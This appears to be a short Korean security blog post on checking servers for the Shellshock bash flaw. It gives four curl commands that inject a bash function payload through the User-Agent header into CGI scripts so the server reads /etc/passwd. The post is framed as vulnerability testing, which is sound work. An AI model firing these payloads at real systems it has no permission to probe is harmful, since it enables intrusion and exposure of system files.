bash shell 영향도 검증
Programming/Security |
2017. 5. 11. 16:48
1. 윈도우용 curl 설치
2. 다운로드
https://curl.haxx.se/download.html
윈도우 7zip 다운
3. cmd창
curl.exe 잇는 폴더로 가기
4. 명령어
curl --max-time 5 -k -A "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/test-cgi
curl --max-time 5 -k -H "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/test-cgi
curl --max-time 5 -k -A "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/authLogin.cgi
curl --max-time 5 -k -H "User-Agent: () { :;}; echo;/bin/cat /etc/passwd" http://아이피:포트/cgi-bin/authLogin.cgi
5. 영향도
/etc/passwd 로 검증하였으므로 passwd 노출되면 영향도 O
'Programming > Security' 카테고리의 다른 글
SQL Injection, XSS, CSRF (0) | 2011.12.05 |
---|---|
웹 서비스 취약점 : OWASP Top 10 (0) | 2011.12.04 |
Transport 계층 프로토콜 : TCP / UDP (0) | 2011.12.04 |
스니핑과 스푸핑 그리고 그에 따른 방어법 (0) | 2011.12.04 |
IDS, IPS, 방화벽, 웹방화벽 구분 (0) | 2011.12.04 |